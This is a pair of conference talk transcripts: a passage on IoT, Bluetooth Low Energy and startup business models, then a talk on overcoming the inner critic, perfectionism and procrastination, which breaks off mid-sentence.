better defaults. They give you intelligence to your app. So that's what's going to make sense. Six-low pan, IPv6, going to come, sure. But the advantage is already there with people who can manage power better, but the opportunity is today. You don't have to wait for things. That's one of our stuff, and that's really tiny stuff. So it's like a sliver of silicon which is sitting over there. So silicon's not really the problem. You actually see the size of the battery, and you look at the size of the silicon. Who's winning over there? It's the battery which is bigger. So size considerations are not on chips anymore. You don't have a battery. You open up your iPhone, it's battery. It's a gigantic, hunking, huge battery. Battery is where it's lagging. Battery technology is lagging. You want to make tons of money? Sure, fix that technology. Everybody knows that. How are we going to do this? So we see a lot of these things happening. Technology makes it possible. We see initial traction in a bunch of markets. We're already seeing those trends happening. But if you're going to make it to the next level, remember this is going to disrupt everything. You like it or not, it's going to disrupt everything. So that's an opportunity over there. But the world of finding what can be done has changed. When I did my couple of startups earlier, I wrote business plans. I wrote these huge pages and pages of stuff which promised investors, oh, this is going to ramp like this. We're going to make this much amount of money. Our users are going to be this many people. All bullshit. Because I had no fucking clue. So I mean, I knew this was a good stuff. But how are the world having to see that this is going to make $100 million like in four years or our revenue is going to be so many? Sure. You give me six salespeople. You could make like $2 million, $3 million, $4 million. The sales guy can knock tenders a week or more follow-up, 35 customers. Yeah, maybe we can think some numbers like that. But really, it was something which we just plucked out of thin air. But the tools have changed. So what we see now is business model canvas. So understanding how to do a business model is key. A lot of these things are happening. But to really tame these things, to really get control over the stuff, you need to spend time with your business model. So things are changing. The semiconductor industry is changing. But you're not in the semiconductor industry. That's really a bottom piece in the pyramid. We can tell you that this is going to change. We can see insights in the market. But for you to take advantage and to leverage that, you need to spend some time in how. So for example, a Nest thermostat is not just selling the thermostat. It's not like selling your iPhone. The iPhone is changing every year. Of course, the guy who designed the Nest thermostat was an ex-Apple employee who had designed the iPod. But he comes to the realization that thermostat's not going to be retrofitted every year. Nobody's going to change their thermostat every year. That doesn't make any sense. So it's clear that they need to actually think of different business models by which they can continue to get in revenue. So the winning or losing or being successful is basically to ensure that you serve people. That's it. The whole point is to serve people. Nothing else. We don't matter. I don't matter. If I'm going to be with a customer, if one of you guys are going to use our chips, we are nobody. We're there to serve you. So that's very fundamental. So we've got to figure out how can we serve these people better? What are the better defaults for them? What intelligence can we get into the apps? But in any case, you need to look at the business model. But as a business model canvas, there are a lot of people in Oslo and in different cities who can help you with that. The startup world is quite aware of that. So it's key activities, value propositions, and how does this value proposition get to the customer? So if you see Nest, right, who is the customer? The customer is the guy who buys your stuff. Yeah, that's one way to look at it. Is the customer the utility company? Maybe. Interestingly, when you look at Post-in Norway, right, the Post-in Norway is a service run by the sovereign, which is interesting. So who are the customers for Post-in? Are you the customer of Post-in? Or is it the guy who stuff all the junk mail inside the postbox as a customer? Who's the customer? Right? Who pays the money? Is he the customer? So obviously, you look at the US Post, there was a startup that said, okay, you know what, you guys are resuming too much of junk mail, so we're going to take control of that. Of course, there are places, there are ways in Norway by which you can say Ingene reclame. You can actually even say to free newspapers that they don't want to be delivered there. That's possible. It's a little bit of a wild west over there. The US Post basically said, guys said, hey, you're resuming a lot of junk mail and you can't even find out your real mail inside a junk mail. So let's do these things. We will take it from your postbox, look through it, throw away all the junk mail, scan whatever is there as real mail and send it digitally to you. So they run a business by which they would drive trucks to post boxes, open it up, you know what, do it. But the US Postal Service said, that's not going to work. You got to stop it because look, you know who the customers for the US Postal Services? It's not the guy who's receiving the mail. It's actually the guys who's sending all the junk mail. Go figure. But that's what a business model would tell you. It'll tell you who you're going to serve. So some of these things, you would need to understand how this is going to work. But remember, win-win is good. Thermostats sitting as intermediaries between energy companies and you so that you save money and energy companies do not and save money is a good thing. But it's up to you. The tools did not exist when I was doing a startup. So today's things of lean startups and so we have business model canvas. Another one which we clearly see as strong thing is the customer development process and of course the minimum viable product. So proposition is not something you're building in isolation. Well the value proposition is about solving a customer problem or need. It really consists of three components. The easy one for most entrepreneurs to talk about is what product features you have or what product services you're providing. But there's actually two more important components to value proposition. What gain are you creating for customers and what pain are you solving for them? Alexander Osterwalder, one of you, true the business model canvas really emphasized this. It's not just about your product and especially if you come from a technical background it's really easy to see, oh look at all these features. And if you find yourself doing that you need to complete the sentence and say yes but here's what we make people be able to do better and here are the problems we solve for them. So the real goal of you figuring out the value proposition is understanding what we call the minimum viable product. You're trying to figure out now that I kind of understand my product and service and that when I'm gaining for customers, when I'm paying, I'm solving what's the smallest possible feature set. I could be shipping on day one that solves these pains and creates gains for them. And this really is an interactive process because there's no way, no possible way, sitting in your office you could figure this out. And the default for great engineers and great entrepreneurs is oh I understand customer's problems and needs so don't worry about it, we'll just spec the entire product on day one. Your real goal here is to figure out what's the smallest thing you could build and develop that actually get you users or sales or whatever and get out the market as quickly as possible. And so the goal of you getting out of the building for value proposition is understanding gains and pains so you could figure out what's the MVP or minimum viable product. This thing did not exist when we were doing startups earlier. So the insight that Steve had running eight startups and able to teach other people about it is very valuable. The same insight that we see market trends would not make any sense to you if you do not understand that to take or grab the opportunity you need to understand some of these things so you can understand how to grab the opportunity. The opportunity is there but you need to understand. The next one that we had was Arduino. Arduino really changed the game with respect to hardware prototyping. As I told you, I worked in the industry when the mobile phones were really palm-o-s, palm-prix, pocket-pc and Windows mobile. So those devices really, when you were working with them and we were creating hardware to work with those devices, we didn't have anything which had a standard hardware. So we had to really create everything from scratch. Huge amount of engineering resources. And startups usually don't have that. So prototyping, fast prototyping, lean methods of development, or insights which we have gained. So some of our partners have actually gone ahead and created things like these. This is not possible and this is perfectly possible to actually go ahead and quickly do prototyping. So you want to have things which change this stuff, you can actually go ahead and do things like that. So quickly about Bluetooth Low Energy. Say power efficiency is something you're going to work with. It's not something that, oh, I put the chip in, I put some code inside it, it's not going to work. You need to understand a little bit more about power efficiency. So you've got to spend some time measuring it, trying to understand what's happening over there. But a typical thing is run quickly, do whatever you're going to do quickly and go to sleep. So meaning we're not going to be running like a PC all the time. So internet access or internet connectivity must also work together with this. Meaning if you've got a bunch of processors or if your server wants to talk to you, it needs to wait until it wakes up and then talks to the server. So when the server, when it's woken up, the server can say, hey, by the way, I've got a whole bunch of other things for you to do and you can do all of this in one shot. So processing cannot be like, okay, whenever you want me to do it, I'm going to be awake. Not going to work like that. So the opportunity today requires you to have the power aware to some more extent. So some of these things, if you look at Bluetooth Low Energy, is that the things in between over here is where you sleep. So this is when the radio runs and it's talking to your internet and you try to sleep as much as possible. And the tools allow you to do that. So you've got to prototype. You've got to learn. You've got to play. So if you play with these things, you learn about these things. If you're keen about doing something about it, go ahead and play with it. And we give you toolkits to work with, how do we know, and help you go through it. We have the pieces for you to play with it. But remember, we are really saying, look, insights are there, trends are there, but unless there is somebody to go and seize the opportunity, it's not going to make anything for us. Be there to help you and to serve you to really say, hey, take advantage of this time. These times are exciting times. Simple things about Bluetooth Smart, any data that you send is typed data. So if you're going to send data, you have to say whether it's a unit or a float or a temperature sensor data or is it glucose meter data or anything like that. So when it goes to your server on your internet back end, it's going to be typed. You already know what it is. It's coming with that bit of context. So you can grab multiple contexts together. You can grab temperature. You can grab location. You can grab temperature. You can grab location. You can grab time. All come to you in the server as contextual data. So you can actually put all of these together easily. The most low-power stuff on these things is, of course, sending asynchronous data. That means you don't want acknowledgments and pinging and pinging of the stuff. So the radio itself provides you acknowledgement, reliable links. So these are reliable links already. And obviously, you want to use the lowest time on air for low-power performance. So key thing, opportunity today really means also that you need to understand a little bit about the hardware for you to do low-power design. To understand a little bit more about the hardware, we give you the Arduino tools to play with it and understand it. You truly can tame the beast. But then when you tame it, you'll know what to name it. The internet of things is not really something which is there. So like, for example, a thermostat, a learning thermostat is an internet thing, but it's a learning thermostat because we as human beings could never figure out how to set a thermostat for low-power for money. And the nest had to do it for us. So the intelligence really lies over there. So better defaults, intelligent devices, and we're not going to ask the human the question. So we have some code. We can look at our GitHub pages. And we are there to help you guys. We have a DevZone portal, ask questions, free-wailing questions, no problem. CarpidM sees the moment. All right. If you have any questions, you can ask me or else I'm done. Okay. Thank you very much. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
We have heard about IoT for years and years, some even claim to have seen it, very few claim to have tamed it and even fewer actually do. Interestingly those who do tame it, claim it to be a different beast altogether. Today, it is easy to add an Bluetooth Smart/Wireless IC/Chip to your physical product and write an app or website for it, Is this not IoT ? Get an insight on what has worked in IoT. How does Bluetooth Smart change the rules for IoT. Learn to quickly prototype your IoT.
10.5446/50591 (DOI)
See, I love it, yeah. So I want to talk about banishing your inner critic. I am actually a former front-end developer and web designer turned creativity consultant or as I like to call it, being a creativity evangelist. So a lot of the stuff that I talk about with kind of helping people get creatively unblocked is has to do with my own process and my own demons that I've wrestled with or that I continue to wrestle with and I figured if I've got them, I can't be the only person who has them and a lot of people after I talk about this stuff are just like, you were like, get out of my head. So let's talk about how to get rid of your inner critic. If you're going to tweet stuff, that's totally fine with me. I won't be mad at you for it. My Twitter handle is denisejacobs. Nice and easy to remember. You know we're at NDC Oslo and you can use banish your critic as the hashtag if you want to hashtag it. So, oh, hi. So like I said, I'm a creativity evangelist and I, because tech is, you know, the tech world is my wheelhouse. I tend to go and do creativity consulting and workshops at companies and corporations and obviously at conferences all over the place. So if you guys actually like what I'm talking about, I can come and talk to your company and it'll be cool. But let me tell you a story to get this all put into perspective. Let me tell you a story. Like I said, this has to do with my own demons so I have a little story for my own life to tell you. Basically, once upon a time in 2009 I got a contract to write my book, The CSS Detective Guide and I was so excited about it. I was so psyched and I set it up in my schedule and June 29th was the day. It was the day that I was going to start. Unfortunately, instead of having it be this process where I like started really delving into my creativity and really, you know, showing my front end development CSS chops and everything, instead of creativity what I ended up practicing instead at least for those first two days was destructivity which is like creativity's evil twin, right? So what ended up happening was I had these voices in my head and they were like monsters. They were coming and they were like merciless and they were just telling me all of these horrible things. And I totally, totally freaked out. And when I say I totally freaked out, I mean, I actually, the first day, the first two days I was completely like useless and I spent one of the time, some of the time on the first day I reached out to this women's technical networking group that I had been a part of in Seattle, Washington called Digital Eve. And I sent an email and I was like, oh my God, I'm freaking out. I am like this and that and I feel like I'm good enough and all this stuff. And so the highlights from the email are here. I shouldn't be writing this. I misrepresented myself. This should be somebody else's book. I'm going to look like a stupid and people are going to see I'm a fake and what if the book isn't good enough and what if I'm not good enough and all of these things were going through my head. As a matter of fact, the first two days that I was supposed to be writing the book, instead of writing and so it wasn't supposed to be doing writing, it was just going to be doing research. I've done research forever in a day. I spent the first two days crying and when I said I was crying, like I'm not like, oh boohoo, boohoo. I mean I was like, oh, I was on the couch and I get myself together back. Okay, all right, all right. And I was a mess. I was such a mess. And then even when I got myself together after those two days, it didn't stop there. Those voices still pushed me into really bad behavior. I worked myself nonstop basically for this book for nine months or eight months. I was like a workhorse basically and I pushed myself to burn out. The last six weeks of that book, I did as a complete all-nighter. And when I say an all-nighter, that meant that I was awake until I couldn't stay awake anymore and then I slept for a few hours, two, three, four hours, then got up and rinse, repeat and do it again. I did that for six weeks. You don't kind of have a toll that takes on your body to not sleep enough for six weeks. It's crazy. So like I said, these internal voices, these critical internal voices basically pushed me to this point where I was kind of completely always anxious, a little depressed and completely stressed all the time. Now we all know, you all are probably familiar with the physical representations of fear, right? Like some people get sweaty palms. I'm not of that variety. Some people get sweaty pits. Sometimes your heart starts pumping. Sometimes your stomach goes into a knot, right? But there's a different kind of fear, which was what I was experiencing, which was all of my internalized criticisms, right? All of these voices, like I was saying. And that basically, I think, translates into your inner critic. And so the inner critic I liken to the subconscious, the bridge under the troll under the bridge of your subconscious, right? So it's there and you've got your regular thoughts kind of crossing the bridge and going out into the world and then you've got this troll, every now and then. And fear, I don't know if you've heard this acronym before, but fear is often likened in English to be translated as false evidence appearing real. But then there's another one, which is actually what usually happens when you're feeling fear as you just go, fuck everything and run. I'm out of here, right? Now for me as a creativity evangelist, as somebody who's very concerned with the whole kind of creative process and wanting to put new things out into the world, for me, creativity, fear is particularly bad because it is like the enemy of creativity, right? Like fear, if you're experiencing fear, you cannot be creative. And I'm not saying that as a theoretical construct. I'm actually saying that there's a neurological evidence that says that when your brain is processing fear in a fear mode, it actually makes it so that your brain waves are different and puts you in a place where if you're not familiar with brain waves, basically the highest two brain waves, beta is kind of normal concentration and focus, alpha is when you're more relaxed like about when you're about to fall asleep and often where people are most creative. And then gamma is a really, really high frequency, which usually happens when you're in kind of a crisis mode. Sometimes when you're like having an aha moment, but usually kind of more in a dangerous place. So when you're constantly stressed and you're in fear, you're actually somewhere between beta and gamma and it's not a good place, right? And so stress and frustration effectively suppresses the generative impulses in your brain that actually are the underpinnings for creative thought and creative thinking. And so when you're in fear, it means that your creative expressions dampened and you can't let all of those great ideas that are rolling around in your head, you can't actually let them out and let them get out into the world. So in order for us to be able to be more creative and in order for us to be able to move forward that way, we need to have ways to identify the inner critic. So I'm going to give you some pointers and some ways to not only identify your inner critic, but also obviously from the name of the presentation, you probably glean this, ways to actually get rid of your inner critic or at least to silence it a bit. So this sort of thing is probably really familiar, right? You know, your brother was more successful than you are and never thought you were going to make it. You're not good enough, you're not smart enough, you should have finished that MBA, etc., etc., etc., right? Not that hard to recognize those kind of things, but there are other ways that your inner critic will probably show up as well. Like if you find yourself being extremely busy all the time, and I also understand that in this country, like in Europe, a lot of times this doesn't happen as much as it does typically in the United States, but I do think that kind of modern Western society, we're going to be, we're bound to actually fall into this in one way, shape, or form. So if you find yourself just being extraordinarily busy all the time, but not really actually being able to produce that much, always busy, but not producing, that's probably your inner critic probably running the show in the background. If you find yourself comparing yourself to others, right, and you're saying, oh my God, I should have done this by now, and I ought to do this, and I must do this thing, then you probably've got some inner critic stuff popping up. If you have a fear that somebody is going to find out at any moment that you really shouldn't be doing what you're doing, and you don't know what the hell you're doing, then most likely that's your inner critic, and that is actually known as imposter syndrome, right? So if you feel like you just got lucky, you're not really that good at it, you just, you know, you got a break, and you're kind of doing this thing, you don't really know what's happening, and oh my God, if somebody actually finds out that I don't know anything, they're totally going to fire me, or I'm totally going to get kicked out, run out of town on the rail, then you're probably experiencing imposter syndrome. Another form of that is I just don't know enough. I have a lot of people who talk about, like, well, you know, I think I would like to speak at conferences, but I just don't think I know enough, and I'm like, you know plenty, go out there and do it, well, I don't know, I don't know, inner critic. Now there is such a thing that is actually the opposite of imposter syndrome and everything, and that is the Dunning-Kruger effect. So you know that there are people sometimes who have a much higher sense of their competency than is actually warranted, where they're just like, dude, I killed that, I totally nailed it, and you're like, you know absolutely nothing, I don't even know how you are like two levels higher than me in this job, it's crazy. So there is something called Dunning-Kruger effect, but most likely if you're feeling like you're a fake and you're going to get found out, then you're not experiencing Dunning-Kruger, you're experiencing imposter syndrome. The interesting thing about imposter syndrome is that there is something that I like to call the imposter syndrome paradox, and that is that if you're experiencing imposter syndrome, that actually means, ironically enough, that you are uniquely qualified to do what you think you are going to be found out that you're a fake about. So if you're experiencing imposter syndrome, take heart and know that that actually means that you're okay, you can do it, and you can kick butt, and you can use that to move forward. Another form that the inner critic shows up in is perfectionism. So it's got to be perfect, it's got to be flawless, I'm just going to do this one little thing before, okay, well I'm going to do this other little thing before I get, well, before I commit it, I'm going to do this other thing. If you have that and then the next thing you know, it takes longer and longer and longer to do it, you've got some perfectionist tendencies going on. Perfectionism's twin brother is procrastination. So if you're like, I'll do it tomorrow, and then you're like, no, I'm really, no, okay, like I said I was going to do it today, but I'm not, I'll totally do it tomorrow. And then you're like, no, no, no, like really, tomorrow is the day I'm totally going to do it. If you're doing a lot of procrastination, then you're also got some inner critic stuff going on. The interesting thing that a lot of people don't know is that perfectionism and procrastination actually feed each other, and I like to think of it as this kind of infinite loop where they feed each other back and forth, and when you want something to be so perfect, you will sometimes push it off because it seems so grand and so big in your brain that you'll push it off and push it off. I just need to do some more research, I just need to pick up this one more thing, I just need to, and then the next thing you know, you've done it late and you may have missed an opportunity because of it. Now the thing is, is that perfectionism is toxic and also procrastination is very damaging. And particularly like I said before, for creativity, and in order for us to get kind of unblocked and allow creativity to flow, we need to do some different things. And one of the things is that I found this really great quote that said that the goal for us as you know, workers, as tech workers, as people who are inherently creative, and by the way, FYI, I am of the mind that if you're a developer, by the way, who here feels like they actually are creative? Give me a show of hands. Yeah? Great. Okay. For the people who are kind of like, I actually, it's my belief that developers and technical people are some of the most creative people on the planet. There are very few folks who you can tell them, you know what, I wanted to do this. And you say, okay, I'll just build it. Think about that for a moment. It's because you're logical and analytical and technical doesn't mean that you're not also creative. So those of you who didn't raise your hands, take that and chew on that for a while while I'm talking. Anyway, this quote I love that the goal for us as creatives, as tech people, as people who are producing stuff that goes out in the world and touches a lot of lives. Our goal is to manage our anxiety so that our energies are used for the productive and satisfying art of creating and not the destructive and debilitating art of self-torture, which is what the inner critic does, right? So this begs the question, how do we banish our inner critic? So first recommendation is to eliminate should, ought, must, have to from your vocabulary. And I love this. I love this picture on Flickr and I love that it says, choose what you want to do. Choose what needs to be done. So a lot of times what ends up happening is we end up having this kind of sense of internal pressure that is actually fake, right? I should be doing this. I must do this. I have to do this. Or oh, God, I have to do this, right? You don't have to do anything. Really. So very few things that you end up having to do should is a really bad word to do. So if you have those and you're operating on those, have that be kind of an indicator that you can stop and check yourself and to start thinking, okay, what absolutely needs to be done? What is going to actually move me forward and do that instead? Another one is to say no to comparisons. So like I had the apples and oranges picture before, right? A lot of times when you compare yourself to other people, you are comparing yourself to a perception that is incorrect often. There is a saying, I don't know if you've heard it, that you cannot compare your insides to somebody else's outsides, right? You look at somebody and you look at what other people are doing and you have no idea what their back story is. You know all of your own back story, but you don't know anybody else's back story. So the best thing to do is to compare yourself to yourself and use that as an impetus to move forward for yourself and not based on anybody else. Another thing that you can do with your inner critic is you can actually ask it questions. You can engage it. The inner critic is basically an internalization, like I said, of all of the criticisms from all kinds of places that you've experienced over the course of your life and most likely from your childhood. So your parents criticizing you, teachers, peers, what have you, that sort of thing, all of that, you internalize that and then it's there actually as a protective mechanism. However, sometimes it's kind of like when people have autoimmune disorders and their body starts attacking itself. But sometimes in a way I kind of think that the inner critic is like that, right? It's working a little too well and sometimes it actually makes you stagnant and keeps you from moving forward. So you can actually engage with your inner critic with that kind of internalized amalgamation of all of these critics from your early life. You can say, where do you come from? What do you want? What's your point basically? If you've got some criticism, like, well, you know that you shouldn't have blah, blah, blah, blah, blah, you can be like, you know what? Not helpful right now. Come back later when I need some criticism. You can kind of dismiss it and you can kind of keep doing that. If any of you guys have practiced mindfulness or meditation, you know that there's a thing called the monkey mind, right? And if you're trying to sit and you're trying to be still and then your thoughts are like what? You can always say thank you, thank you, not now. Not now. And you can do the same thing with your inner critic. You can also actually, in addition to kind of not now and pushing it off, you can also be compassionate with your inner critic. Because I thank you so much for trying to protect me, but I actually don't need it right now. And you can actually use that and, you know, have that work for your advantage. One of the last things I want to say for this section is that you can reassign duty. The inner critic is actually really helpful at times when you need criticism. When you're writing or when you're creating something or you're sketching out ideas, you don't need some critic in the background going, you missed this, well you shouldn't do that, well that's going to be stupid, that's not going to work. You don't need that. What you need is once you have all of the ideas and you need to start vetting them, then you need something to criticize. So you can always, again, be like, reason with your critic and say thank you, come back when I need to vet this stuff. Don't need you right now, but in a little bit I'm going to need you when I vet this stuff. So come back later. That's what I want to help too. Another thing you can do is to remember your successes. So a lot of times for me, for example, when I'm trying to work on something and like if I have to write an article and then all of a sudden I'll start freaking out about writing an article like I haven't written a whole book before, right? And so a lot of times I will actually get things around me that either inspire me or that I've made and I'll be like, okay, I did write the book, great. I did make this, I did make that, I make stuff, I write stuff, it's okay, I can do this thing that's in front of me. And sometimes that helps me move forward. And then another thing you can do is just to maintain perspective. Like I said, if you're asking it questions, what's your point, what do you want, who are you, you can also say so what. Don't even care. You're talking and you're back there chipper, chipper, chipper, and you can just be like, whatever, don't even care. Great little exercise that I want you guys to do. You guys have enough room, I feel so bad, the pitch is so steep, I feel like if you stand up you're going to like, woo, fall over. But you guys, can you stand up? All right. So Amy Cuddy did a TED talk talking about how your brain and your body work together and that if you actually change your physical stance, you can actually change the way your brain is working. So this is something she calls a power pose. Now a lot of times, especially when you're feeling kind of down on yourself, your inner critic is like up in arms and like, you know, it's full regalia, you know, telling you a long litany of all the things that are wrong with you. You can counter it by changing your body position. So if you kind of, this is, you guys ready? Okay. So I want you to get in your most slumped over. I can't do it. I totally suck. Oh my God, it's horrible. When are you ever going to get a real job, do something with your life? Okay. Now, shake it off. Now I want you to adopt your favorite superhero pose. You can stand with your hands on your, yeah! All right. Woo! You can fly through the air. Yes, my favorite one. It's looking off in the distance. All right. Let's try it. Shake it off. Okay. One more time. Get into it. Oh, it's a horrible thing. All the things I can't believe you did a done. Why, why, your sister, your brother's so much better. No, they're not making up money. Okay. Woo! Shake it off. Ready? Hit it. Hit it. All right. So, if you hold, thank you very much. You can sit down. If you hold that position for 15 to 30 seconds, it is actually, studies have shown that it will actually change your neurobiology. It will change your neurochemistry. It will change what your brain is thinking and it will help you get into a more empowered place. So, do that. Now, here is my favorite part of the presentation. I just finished writing an article called Breaking the Perfectionism Procrastination Infinite Loop, which is on the Web Standard Sherpa website. You guys, I'll have the URL later on. But in particular, what I'm particularly afflicted with is the perfectionism procrastination infinite loop, which is why I wrote the article. And incidentally, ironically enough, I have to tell you guys, because I think it's right, I laugh about it now, I was two weeks late on the article. I said I was going to give it to them on the 26th of March. I gave it to her sometime in April. Number one. Number two, the article was supposed to be 750 to 1,000 words long. Guess how long the article is? Guess. Somebody guess. How? Dup. Dup. 2,500 words. Good call. What? That's crazy. I'm writing this stuff because I need it too, right? So, in terms of perfectionism, like I said, perfectionism is very toxic. And you may have heard this quote, that perfectionism is self-abuse of the highest order. Now, what happens is, is that we've got this beautiful, perfect, wonderful picture in our heads, and then we're trying to achieve this beautiful, wonderful picture instead of realizing that everything kind of needs a start of some sort, right? So we spend all this time putting all this extra time into stuff unnecessarily. So perfectionists also basically will focus on the finished product, right, instead of focusing on the process. Interestingly enough, there was a study done where they took two groups and they put them in a pottery studio and they said, okay, group number one, I want you guys to build the perfect pot. Throw me the perfect pot. Group number two, they said, I want you guys to throw as many pots as possible. Guess which group threw the better pots? The many, right? Because they didn't care. They were like, zhup, zhup, zhup, zhup, zhup, zhup, and the more they did it, the more practice they got and the better the pots got. The ones that were trying to do the best pot were getting frustrated, were getting like, knocking themselves out, killing themselves to try to attain this perfect standard and they never made it, right? So think about that when you're doing something. Do you want to like get the practice? Do you want to get better by getting the practice or you want to get better by just doing it perfect out of the gate, which doesn't exist, right? What ends up also happening is that perfectionists and perfectionist procrastinators are successful in spite of their perfectionism, not because of it. So also keep that in mind. So some ways to start combating perfectionism. Sometimes perfectionists are perfectionists because we are seeking approval from other people. But what you really find out and what you, when you have like a moment of clarity is remember that people are really into themselves, right? They pay attention to you for like a hot second and then they're off somewhere else, right? They're like, oh yeah, so let's really great about you talking about me. They're like, let's talk about me. So remember that people are very egocentric. Pretty much no one really cares that much and no one else really matters. So try to really focus on just doing stuff for yourself. Great quote by Maya Angelou who just passed away last week, which is, you're enough and you have nothing to prove to anybody. Another way to, another little kind of mind shift that you can do to kind of help this perfectionist streak that you may have is to decouple your performance from who you are, right? Most people who are perfectionists, myself included, think if I don't do this amazingly then I'm a failure, right? Then I'm not a good person. But my performance on doing stuff doesn't really change whether I'm a good person or not, right? I'm a good person because I'm kind or I pick up garbage or whatever, right? It's not because I do something absolutely perfect every time. A lot of times perfectionism has to do with this fear of failure as well. And there's a great quote from a movie After Earth and I actually missed. So this is great. As a perfectionist I look at the slide and go, oh my God, it's totally messed up. Like, you know, if I hadn't told you guys you wouldn't have noticed. It's one of those things. Just sharing you with me my process. So great quote from the movie After Earth, which is fear is not real. It is a product of the thoughts that you create. Danger is real, but fear is a choice, right? So whenever you're having those moments where you're like, I gotta do it perfectly and I gotta do this and if I don't do it and everybody's gonna say it's gonna be horrible and blah, think about the fact that this is actually just a habit pattern that your brain is going through and that you can choose to stop it at any moment. And you can say, actually that's not true. Let's just focus on doing this thing and do it. Another suggestion for dealing with failure is actually refailing failure and also kind of reframing mistakes and potentially, potentially even embracing them. Great quote is that failure is only the opportunity to begin again more intelligently. So when you fail at something, you actually get the chance to learn from it. You get to learn from it and you get to make it better. And you also have to remember that most things that are really successful had extremely humble beginnings. This is the webpage for Twitter. The very, very first, I could, listen, I got it off the web, I couldn't make this up. This is the very first homepage for Twitter when it very first launched and it's like crazy. If you read it, it's just like got horrible text speak in it and everything. They were just doing their own thing, blessed their hearts. But they figured it out and they got it better and now it's either you love it or you hate it. Obviously, they're successful to some degree with what they've done. Another thing that you can do to kind of help reframe failure is to copy the masters of fail and that's children. Children are amazing at failing and learning from it and having complete and utter resiliency. So kids, how many of you guys are parents in here? Yeah? Great. So you know that when your babies took their first steps, they took their first step and fell down and then they got up completely unfazed. Like they didn't even know that they're supposed to be embarrassed or like not, be upset about it and stuff. They just fell and then like whoops and then they got right back up and you just cheering them the whole time. You didn't care that they fall. Let's babies do, babies fall. We fall when we're trying something new. That's what we do, right? So you take your steps, you fall if you want to, practice it in private. Practice it in private first so that you get that whole process down and then try again and keep stepping. Another practice for you that I think is really, really important and really a great way to frame this is something called satisfying. Are you guys familiar with the term, satisfies? Okay, so satisfies comes from doing something satisfactorily and suffice. So satisfactory and suffice together makes satisfies. So basically it is doing it to the point that is needed and then letting it go. Another way I like to think about it is you guys have heard of Pareto's principle, the 80-21, like so in business they say 20% of your customers are giving you 80% of your business, right? You can effectively let go of the 80% of your customers and you would still be successful because it's really that 20%. So I like to think of it this way. I kind of am thinking of it as like an inverse Pareto's that you put in 80% of your 100% effort because your 100% effort is probably a bar that's so high that you can't even see it practically. It's like a sky high bar because when perfectionists have standards they have extremely high standards, right? So take your high standard and instead of trying to reach the ultimate of it, the 100%, go for 80% of it. Your 80% with your high standards is probably the equivalent of somebody else's 150%. And especially the people that are like going to be evaluating you, right? So go for that 80% because that extra 20% is going to be not sleeping, stress, like just totally like letting go of your sanity to try to get that extra 20% and it's not worth it. Another thing that you can do that I personally really like is to make it bad and make it ugly, right? Sometimes when you're a perfectionist you won't start on stuff, this is the procrastination part of it, you won't start on something because you just want it to be so good. But that just takes a long time. Sometimes if you just give yourself permission for it to be bad, you will get started and then you can take that and you can iterate on it. So one of my favorite things that I did when I was writing my book, when I would have these like, oh my God, this chapter needs to be really good, I'd be like, okay, you know what, I'm not getting anywhere. I'm going to write a really bad sentence and then I'm going to write another really bad sentence and another one and this paragraph is going to suck and this chapter is going to suck. But you know what, I wrote it and then I could work with it and I could edit it and sometimes it didn't actually suck, I just needed something to move me forward. So make it bad and make it ugly. Remember with perfectionism and trying to be right is that being right keeps us in place and being wrong forces us to explore. And then finally with this perfectionism thing, remember that there is a difference between perfectionism and excellence, right? There's a difference between something being perfect and something being excellent. You can have something be high quality and great, but it doesn't mean that it has to be perfect. Okay, finally, with this whole procrastination business. So like I said, the perfectionism leads into the procrastination, they go back and forth. So let's talk about the procrastination aspect of things. I don't know if you guys have seen the field guide, the procrastinator's field guide. It's totally, you have to look it up. It's really, really funny. There's like 12 different kinds of procrastinators. Are you a napper or are you a panicker? Are you a list maker? So if you're in procrastination mode, you'll probably be like, oh yeah, I'm totally going to look that up right now, right? But the trick is actually not determining what kind of procrastinator you are, nor is it like administering a dose of fuck it all. Like fuck it all, I'm not going to do anything, right? It is really about kind of understanding what's going on when you procrastinate. Procrastination actually is not laziness. A lot of people confuse it with laziness. It's really actually a misguided sense of activity based on kind of a lack of clarity and also a really low tolerance for frustration and failure. So when you're procrastinating, know that a lot of times it's because of that and it's also because potentially the thing that you're supposed to be doing doesn't have enough value for you. You can't see it in the context of a big picture. So you're like, oh god, I have to do this thing. So one of the first things that you can do to deal with procrastination is to increase the meaning and value of the task. If you know where this task fits in and the grand scale of your goals, right, and how it's going to move you forward, you will be way more incentivized to actually accomplish it and to achieve it and to get to it. Another thing you can do is to do a few mind tricks. And I really love this. So some of my favorite mind tricks to do with procrastination have to do with getting ready to do something instead of actually doing it. Setting everything up. Okay, I got my, you know, all my stuff for writing. Okay, I got like, I did all the research, I got all the research ready. Okay, I got this. Okay, I got that. I'm not really doing it. I'm just getting everything ready in place before I do it. But guess what happens when you get everything ready to do something? What are you doing? You're doing it, right? You actually do. You're like, because the process of getting ready for it actually gets you excited, right? So you're like, oh, wow, wow, okay, I got this, I got this. Maybe I'll just, I'll just, and then you're like, I'll just write a sentence. I'll just write a couple lines of code. No problem. I'll just sketch it out. I'm just going to sketch it out to get ready to do the stuff. And if that works for you, do it, because it will actually get you out of the line. Yeah, you know, I'll do it. I'll do it later. I got time. No, just start getting ready to do it. Another trick, and I found this when I was doing my research, is something called structured procrastination. Has anybody heard of this? Great. Like, everybody's like, no. So, structured procrastination is actually another little, like weird little thing that you can play with yourself, which is to have three really high priority things, for example, and have them all on your list. And then you're like, I'm not going to do the first thing, but I'm going to do the second thing. Or I'm not going to do the first and second thing, I'm going to do the third thing. They're all really high priority, really important things to do. So you may be procrastinating on the first thing, that's the top priority, but you're still getting other things that are important done. The trick with the structured procrastination is not to confuse that with actual procrastination, which is I'm going to organize all of my screws. That is not part of structured procrastination. That's probably not as important as finishing the app that you are trying to do, or try to find funding, or get a new job, or whatever it is. You got some time and space tricks that I want to share with you. The first one is to make sure. I'm sorry, I love this video so much. You guys should totally watch this. It's called Shit Black Girls Say, and it is one of the funniest things I've ever seen. And so you have to watch it, and it goes, delete. So one of the first things that you have to do is eliminate distractions and start deleting things. I just did a workshop yesterday called Hacking the Creative Brain, which you all missed, except for Michael here, they all missed, and it was awesome. But one of the things that I have my students do in this workshop is to make what I call a to-don't list. And that is to make a list of things that you are going to commit to not do anymore. You're either going to delegate them, you're going to dismiss them, or you're going to drop them. And so eliminating distractions, eliminating things is really important. Scott Hanselman has this great talk, he's going to be doing it, I think, tomorrow about the scaling yourself. And one of the things that he says in it is, it's not what you read, it's what you ignore. Right? So a lot of times you have to be very deliberate about what you're going to ignore. You can't look at everything. You can't read every email. 